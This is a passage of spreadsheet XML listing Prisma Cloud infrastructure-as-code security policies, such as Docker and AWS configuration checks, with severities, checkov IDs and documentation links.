        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="W671" t="inlineStr">
        <is>
          <t>Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option</t>
        </is>
      </c>
      <c r="X671" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-yum-signed</t>
        </is>
      </c>
      <c r="Y671" t="inlineStr"/>
      <c r="Z671" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA671" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB671" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC671" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_9</t>
        </is>
      </c>
      <c r="AD671" t="b">
        <v>1</v>
      </c>
      <c r="AE671" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF671" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>6e520622-3985-4d86-b123-cfede1b01224</t>
        </is>
      </c>
      <c r="AI671" t="inlineStr"/>
      <c r="AJ671" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK671" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" t="inlineStr"/>
      <c r="B672" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C672" s="2" t="inlineStr"/>
      <c r="D672" t="inlineStr"/>
      <c r="E672" t="inlineStr"/>
      <c r="F672" t="inlineStr"/>
      <c r="G672" t="b">
        <v>1</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J672" t="inlineStr">
        <is>
          <t>IaC:General:ADD</t>
        </is>
      </c>
      <c r="K672" t="inlineStr">
        <is>
          <t>Copy is not used instead of Add in Dockerfiles</t>
        </is>
      </c>
      <c r="L672" t="inlineStr"/>
      <c r="M672" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N672" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O672" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P672" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q672" t="inlineStr"/>
      <c r="R672" t="inlineStr"/>
      <c r="S672" t="inlineStr"/>
      <c r="T672" t="b">
        <v>0</v>
      </c>
      <c r="U672" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V672" t="inlineStr">
        <is>
          <t>IaC:General:ADD</t>
        </is>
      </c>
      <c r="W672" t="inlineStr">
        <is>
          <t>Ensure that COPY is used instead of ADD in Dockerfiles</t>
        </is>
      </c>
      <c r="X672" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-copy-is-used-instead-of-add-in-dockerfiles</t>
        </is>
      </c>
      <c r="Y672" t="inlineStr"/>
      <c r="Z672" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["ADD"]}</t>
        </is>
      </c>
      <c r="AA672" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB672" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC672" t="inlineStr">
        <is>
          <t>CKV_DOCKER_4</t>
        </is>
      </c>
      <c r="AD672" t="b">
        <v>1</v>
      </c>
      <c r="AE672" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF672" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>2985c9ff-18f7-42bb-9883-a7c3ae1f9b01</t>
        </is>
      </c>
      <c r="AI672" t="inlineStr"/>
      <c r="AJ672" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK672" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" t="inlineStr"/>
      <c r="B673" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C673" s="2" t="inlineStr"/>
      <c r="D673" t="inlineStr"/>
      <c r="E673" t="inlineStr"/>
      <c r="F673" t="inlineStr"/>
      <c r="G673" t="b">
        <v>1</v>
      </c>
      <c r="H6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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J673" t="inlineStr">
        <is>
          <t>IaC:General:AWS::ApiGatewayV2::Stage,AWS::Serverless::HttpApi</t>
        </is>
      </c>
      <c r="K673" t="inlineStr">
        <is>
          <t>AWS API Gateway V2 has Access Logging is disabled</t>
        </is>
      </c>
      <c r="L673" t="inlineStr"/>
      <c r="M673" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N673" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O673" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P673" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q673" t="inlineStr"/>
      <c r="R673" t="inlineStr"/>
      <c r="S673" t="inlineStr"/>
      <c r="T673" t="b">
        <v>0</v>
      </c>
      <c r="U673" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V673" t="inlineStr">
        <is>
          <t>IaC:General:AWS::ApiGatewayV2::Stage,AWS::Serverless::HttpApi</t>
        </is>
      </c>
      <c r="W673" t="inlineStr">
        <is>
          <t>Ensure API Gateway V2 has Access Logging enabled</t>
        </is>
      </c>
      <c r="X673" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-logging-30</t>
        </is>
      </c>
      <c r="Y673" t="inlineStr"/>
      <c r="Z673" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["AWS::ApiGatewayV2::Stage","AWS::Serverless::HttpApi"]}</t>
        </is>
      </c>
      <c r="AA673" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB673" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC673" t="inlineStr">
        <is>
          <t>CKV_AWS_95</t>
        </is>
      </c>
      <c r="AD673" t="b">
        <v>1</v>
      </c>
      <c r="AE673" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF673" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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3" t="inlineStr">
        <is>
          <t>85811ee6-0571-4166-9625-095ecf1d0053</t>
        </is>
      </c>
      <c r="AI673" t="inlineStr"/>
      <c r="AJ673" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK673" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" t="inlineStr"/>
      <c r="B674" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C674" s="2" t="inlineStr"/>
      <c r="D674" t="inlineStr"/>
      <c r="E674" t="inlineStr"/>
      <c r="F674" t="inlineStr"/>
      <c r="G674" t="b">
        <v>1</v>
      </c>
      <c r="H6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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J674" t="inlineStr">
        <is>
          <t>IaC:General:AWS::AppSync::GraphQLApi,aws-appsync</t>
        </is>
      </c>
      <c r="K674" t="inlineStr">
        <is>
          <t>AWS AppSync's logging is disabled</t>
        </is>
      </c>
      <c r="L674" t="inlineStr"/>
      <c r="M674" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N674" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O674" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P674" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q674" t="inlineStr"/>
      <c r="R674" t="inlineStr"/>
      <c r="S674" t="inlineStr"/>
      <c r="T674" t="b">
        <v>0</v>
      </c>
      <c r="U674" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V674" t="inlineStr">
        <is>
          <t>IaC:General:AWS::AppSync::GraphQLApi,aws-appsync-graphql-api</t>
        </is>
      </c>
      <c r="W674" t="inlineStr">
        <is>
          <t>Ensure AppSync has Logging enabled</t>
        </is>
      </c>
      <c r="X674" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsyncs-logging-is-enabled</t>
        </is>
      </c>
      <c r="Y674" t="inlineStr"/>
      <c r="Z674" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["AWS::AppSync::GraphQLApi", "aws_appsync_graphql_api"]}</t>
        </is>
      </c>
      <c r="AA674" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB674" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC674" t="inlineStr">
        <is>
          <t>CKV_AWS_193</t>
        </is>
      </c>
      <c r="AD674" t="b">
        <v>1</v>
      </c>
      <c r="AE674" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF674" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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4" t="inlineStr">
        <is>
          <t>4a84ac0e-9881-4afd-ac3c-7d5c6da1de8b</t>
        </is>
      </c>
      <c r="AI674" t="inlineStr"/>
      <c r="AJ674" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK674" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" t="inlineStr"/>
      <c r="B675" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C675" s="2" t="inlineStr"/>
      <c r="D675" t="inlineStr"/>
      <c r="E675" t="inlineStr"/>
      <c r="F675" t="inlineStr"/>
      <c r="G675" t="b">
        <v>0</v>
      </c>
      <c r="H6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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J675" t="inlineStr">
        <is>
          <t>IaC:General:AWS::EC2::Instance,AWS::RDS::DBInstance</t>
        </is>
      </c>
      <c r="K675" t="inlineStr">
        <is>
          <t>rannaladasu-test-policy-cf</t>
        </is>
      </c>
      <c r="L675" t="inlineStr"/>
      <c r="M675" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N675" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O675" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P675" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q675" t="inlineStr"/>
      <c r="R675" t="inlineStr"/>
      <c r="S675" t="inlineStr"/>
      <c r="T675" t="b">
        <v>0</v>
      </c>
      <c r="U675" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V675" t="inlineStr">
        <is>
          <t>IaC:General:AWS::EC2::Instance,AWS::RDS::DBInstance</t>
        </is>
      </c>
      <c r="W675" t="inlineStr"/>
      <c r="X675" t="inlineStr"/>
      <c r="Y675" t="inlineStr"/>
      <c r="Z675" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["AWS::EC2::Instance","AWS::RDS::DBInstance"],"conditionQuery":{"attribute":"Tags.Key","operator":"not_exists","value":"","cond_type":"attribute"}}</t>
        </is>
      </c>
      <c r="AA675" t="inlineStr">
        <is>
          <t>Raj Annaladasu</t>
        </is>
      </c>
      <c r="AB675" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC675" t="inlineStr"/>
      <c r="AD675" t="b">
        <v>0</v>
      </c>
      <c r="AE675" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF675" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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5" t="inlineStr">
        <is>
          <t>fcfc51cd-fc6c-487e-873d-8d59146c6605</t>
        </is>
      </c>
      <c r="AI675" t="inlineStr"/>
      <c r="AJ675" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK675" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" t="inlineStr"/>
      <c r="B676" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C676" s="2" t="inlineStr"/>
      <c r="D676" t="inlineStr"/>
      <c r="E676" t="inlineStr"/>
      <c r="F676" t="inlineStr"/>
      <c r="G676" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J676" t="inlineStr">
        <is>
          <t>IaC:General:AWS::QLDB::Ledger,aws-qldb</t>
        </is>
      </c>
      <c r="K676" t="inlineStr">
        <is>
          <t>AWS QLDB ledger has deletion protection is disabled</t>
        </is>
      </c>
      <c r="L676" t="inlineStr"/>
      <c r="M676" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N676" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O676" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P676" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q676" t="inlineStr"/>
      <c r="R676" t="inlineStr"/>
      <c r="S676" t="inlineStr"/>
      <c r="T676" t="b">
        <v>0</v>
      </c>
      <c r="U676" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V676" t="inlineStr">
        <is>
          <t>IaC:General:AWS::QLDB::Ledger,aws-qldb-ledger</t>
        </is>
      </c>
      <c r="W676" t="inlineStr">
        <is>
          <t>Ensure QLDB ledger has deletion protection enabled</t>
        </is>
      </c>
      <c r="X676" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-storage-1</t>
        </is>
      </c>
      <c r="Y676" t="inlineStr"/>
      <c r="Z676" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["AWS::QLDB::Ledger","aws_qldb_ledger"]}</t>
        </is>
      </c>
      <c r="AA676" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB676" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC676" t="inlineStr">
        <is>
          <t>CKV_AWS_172</t>
        </is>
      </c>
      <c r="AD676" t="b">
        <v>1</v>
      </c>
      <c r="AE676" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF676" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>7b025835-c70a-432b-8ee3-d791db453691</t>
        </is>
      </c>
      <c r="AI676" t="inlineStr"/>
      <c r="AJ676" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK676" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" t="inlineStr"/>
      <c r="B677" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C677" s="2" t="inlineStr"/>
      <c r="D677" t="inlineStr"/>
      <c r="E677" t="inlineStr"/>
      <c r="F677" t="inlineStr"/>
      <c r="G677" t="b">
        <v>1</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J677" t="inlineStr">
        <is>
          <t>IaC:General:AWS::Serverless::Function,AWS::Lambda::Function,aws-lambda</t>
        </is>
      </c>
      <c r="K677" t="inlineStr">
        <is>
          <t>AWS Lambda encryption settings environmental variable is not set properly</t>
        </is>
      </c>
      <c r="L677" t="inlineStr"/>
      <c r="M677" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N677" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O677" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P677" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q677" t="inlineStr"/>
      <c r="R677" t="inlineStr"/>
      <c r="S677" t="inlineStr"/>
      <c r="T677" t="b">
        <v>0</v>
      </c>
      <c r="U677" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V677" t="inlineStr">
        <is>
          <t>IaC:General:AWS::Serverless::Function,AWS::Lambda::Function,aws-lambda-function</t>
        </is>
      </c>
      <c r="W677" t="inlineStr">
        <is>
          <t>Check encryption settings for Lambda environmental variable</t>
        </is>
      </c>
      <c r="X677" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-serverless-policies/bc-aws-serverless-5</t>
        </is>
      </c>
      <c r="Y677" t="inlineStr"/>
      <c r="Z677" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["AWS::Serverless::Function","AWS::Lambda::Function","aws_lambda_function"]}</t>
        </is>
      </c>
      <c r="AA677" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB677" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC677" t="inlineStr">
        <is>
          <t>CKV_AWS_173</t>
        </is>
      </c>
      <c r="AD677" t="b">
        <v>1</v>
      </c>
      <c r="AE677" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF677" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>b3c159b3-00cb-42f3-8841-14e434421947</t>
        </is>
      </c>
      <c r="AI677" t="inlineStr"/>
      <c r="AJ677" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK677" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" t="inlineStr"/>
      <c r="B678" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C678" s="2" t="inlineStr"/>
      <c r="D678" t="inlineStr"/>
      <c r="E678" t="inlineStr"/>
      <c r="F678" t="inlineStr"/>
      <c r="G678" t="b">
        <v>1</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J678" t="inlineStr">
        <is>
          <t>IaC:General:EXPOSE</t>
        </is>
      </c>
      <c r="K678" t="inlineStr">
        <is>
          <t>Port 22 is exposed</t>
        </is>
      </c>
      <c r="L678" t="inlineStr"/>
      <c r="M678" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N678" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O678" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P678" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q678" t="inlineStr"/>
      <c r="R678" t="inlineStr"/>
      <c r="S678" t="inlineStr"/>
      <c r="T678" t="b">
        <v>0</v>
      </c>
      <c r="U678" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V678" t="inlineStr">
        <is>
          <t>IaC:General:EXPOSE</t>
        </is>
      </c>
      <c r="W678" t="inlineStr">
        <is>
          <t>Ensure port 22 is not exposed</t>
        </is>
      </c>
      <c r="X678" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-port-22-is-not-exposed</t>
        </is>
      </c>
      <c r="Y678" t="inlineStr"/>
      <c r="Z678" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["EXPOSE"]}</t>
        </is>
      </c>
      <c r="AA678" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB678" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC678" t="inlineStr">
        <is>
          <t>CKV_DOCKER_1</t>
        </is>
      </c>
      <c r="AD678" t="b">
        <v>1</v>
      </c>
      <c r="AE678" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF678" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>8e0be113-366f-461c-9fb7-4d646ae9a509</t>
        </is>
      </c>
      <c r="AI678" t="inlineStr"/>
      <c r="AJ678" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK678" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" t="inlineStr"/>
      <c r="B679" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C679" s="2" t="inlineStr"/>
      <c r="D679" t="inlineStr"/>
      <c r="E679" t="inlineStr"/>
      <c r="F679" t="inlineStr"/>
      <c r="G679" t="b">
        <v>1</v>
      </c>
      <c r="H6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79" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J679" t="inlineStr">
        <is>
          <t>IaC:General:FROM</t>
        </is>
      </c>
      <c r="K679" t="inlineStr">
        <is>
          <t>Docker From alias is not unique for multistage builds</t>
        </is>
      </c>
      <c r="L679" t="inlineStr"/>
      <c r="M679" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N679" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O679" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P679" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q679" t="inlineStr"/>
      <c r="R679" t="inlineStr"/>
      <c r="S679" t="inlineStr"/>
      <c r="T679" t="b">
        <v>0</v>
      </c>
      <c r="U679" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V679" t="inlineStr">
        <is>
          <t>IaC:General:FROM</t>
        </is>
      </c>
      <c r="W679" t="inlineStr">
        <is>
          <t>Ensure From Alias are unique for multistage builds.</t>
        </is>
      </c>
      <c r="X679" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds</t>
        </is>
      </c>
      <c r="Y679" t="inlineStr"/>
      <c r="Z679" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["FROM"]}</t>
        </is>
      </c>
      <c r="AA679" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB679" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC679" t="inlineStr">
        <is>
          <t>CKV_DOCKER_11</t>
        </is>
      </c>
      <c r="AD679" t="b">
        <v>1</v>
      </c>
      <c r="AE679" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF679" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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79" t="inlineStr">
        <is>
          <t>eb4a901e-a5cc-4490-915a-8b9287425572</t>
        </is>
      </c>
      <c r="AI679" t="inlineStr"/>
      <c r="AJ679" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK679" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" t="inlineStr"/>
      <c r="B680" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C680" s="2" t="inlineStr"/>
      <c r="D680" t="inlineStr"/>
      <c r="E680" t="inlineStr"/>
      <c r="F680" t="inlineStr"/>
      <c r="G680" t="b">
        <v>1</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J680" t="inlineStr">
        <is>
          <t>IaC:General:FROM</t>
        </is>
      </c>
      <c r="K680" t="inlineStr">
        <is>
          <t>Base image uses a latest version tag</t>
        </is>
      </c>
      <c r="L680" t="inlineStr"/>
      <c r="M680" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N680" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O680" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P680" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q680" t="inlineStr"/>
      <c r="R680" t="inlineStr"/>
      <c r="S680" t="inlineStr"/>
      <c r="T680" t="b">
        <v>0</v>
      </c>
      <c r="U680" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V680" t="inlineStr">
        <is>
          <t>IaC:General:FROM</t>
        </is>
      </c>
      <c r="W680" t="inlineStr">
        <is>
          <t>Ensure the base image uses a non latest version tag</t>
        </is>
      </c>
      <c r="X680" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag</t>
        </is>
      </c>
      <c r="Y680" t="inlineStr"/>
      <c r="Z680" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["FROM"]}</t>
        </is>
      </c>
      <c r="AA680" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB680" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC680" t="inlineStr">
        <is>
          <t>CKV_DOCKER_7</t>
        </is>
      </c>
      <c r="AD680" t="b">
        <v>1</v>
      </c>
      <c r="AE680" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF680" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
        <is>
          <t>4a5d5094-4d50-4844-8ebe-d0dbda6f607a</t>
        </is>
      </c>
      <c r="AI680" t="inlineStr"/>
      <c r="AJ680" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK680" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" t="inlineStr"/>
      <c r="B681" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C681" s="2" t="inlineStr"/>
      <c r="D681" t="inlineStr"/>
      <c r="E681" t="inlineStr"/>
      <c r="F681" t="inlineStr"/>
      <c r="G681" t="b">
        <v>1</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J681" t="inlineStr">
        <is>
          <t>IaC:General:MAINTAINER</t>
        </is>
      </c>
      <c r="K681" t="inlineStr">
        <is>
          <t>LABEL maintainer is used instead of MAINTAINER (deprecated)</t>
        </is>
      </c>
      <c r="L681" t="inlineStr"/>
      <c r="M681" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N681" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O681" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P681" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q681" t="inlineStr"/>
      <c r="R681" t="inlineStr"/>
      <c r="S681" t="inlineStr"/>
      <c r="T681" t="b">
        <v>0</v>
      </c>
      <c r="U681" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V681" t="inlineStr">
        <is>
          <t>IaC:General:MAINTAINER</t>
        </is>
      </c>
      <c r="W681" t="inlineStr">
        <is>
          <t>Ensure that LABEL maintainer is used instead of MAINTAINER (deprecated)</t>
        </is>
      </c>
      <c r="X681" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-label-maintainer-is-used-instead-of-maintainer-deprecated</t>
        </is>
      </c>
      <c r="Y681" t="inlineStr"/>
      <c r="Z681" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["MAINTAINER"]}</t>
        </is>
      </c>
      <c r="AA681" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB681" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC681" t="inlineStr">
        <is>
          <t>CKV_DOCKER_6</t>
        </is>
      </c>
      <c r="AD681" t="b">
        <v>1</v>
      </c>
      <c r="AE681" t="inlineStr">
        <is>
